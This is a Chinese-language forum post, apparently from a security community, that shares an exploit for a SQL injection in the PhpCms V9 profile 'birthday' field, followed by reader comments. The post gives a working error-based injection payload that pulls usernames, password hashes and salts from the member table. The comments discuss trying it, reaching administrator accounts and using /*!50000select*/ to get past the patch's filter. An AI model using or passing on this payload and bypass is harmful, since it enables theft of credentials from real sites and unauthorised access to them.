PhpCms V9 info[birthday]注入利用
既然官方已经确认了,那就发一下所谓的EXP吧。权当交流,大家测试即可,请勿用于非法。
注册后登录,找到个人资料,修改生日,拦截数据包或者直接firebug找到info[birthday],将其修改如下:
info[birthday=(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select concat(username,0x3a, password, 0x3a, encrypt) FROM `v9_member` WHERE 1 limit 1),1,62)))a from information_schema.tables group by a)b)]
评论13次
测试了下, 果然很犀利,不过小弟不才,不知道怎么爆全部管理.
这种注入方式以后看来要多尝试了,
测试下,,感谢...........
md5 密码是硬伤!
谁给个90sec的邀请码呗 。。。。。。。。。。我等小辈 不胜感激
爆出来的账户后台登陆显示不存在,是否是补丁已打的征兆?
先拿去测试下
哈哈 谢谢楼主
楼主这代码绕不过对select的过滤的。
。。。很不清楚。。。日期都没检查。。。这代码是如何写的?。。
为什么和90sec的exp不一样,补丁不是过滤了select update这些吗,90里的大牛说使用/*!50000select*/代替select绕过检测
感谢楼主,楼主好人,,马上去测试。。